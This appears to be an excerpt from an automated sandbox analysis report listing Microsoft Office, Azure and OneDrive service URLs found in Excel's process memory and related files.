      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://messaging.office.com/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/loglHf
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.302153789.0000000012EB2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303075559.0000000012EB2000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/i
      Source: EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583502089.000000000DDE0000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.388601099.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300819273.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.389997345.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302225669.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.502179762.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.307988337.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303172575.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453179953.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422439258.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585171728.0000000012F2E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/uih
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netKU
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com#
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com)
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com1
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com1GV
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com7
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com;
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com=
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comG
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comI
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comM
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comQ
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comc
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comw
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.comP
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdatedR
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com($
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?ia
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000003.452144265.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.421742854.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583546383.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388770020.000000000DE2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501193285.000000000DE2A000.00000004.00000001.sdmpString found in binary or memory: https://outlook.o
      Source: EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://outlook.office.com
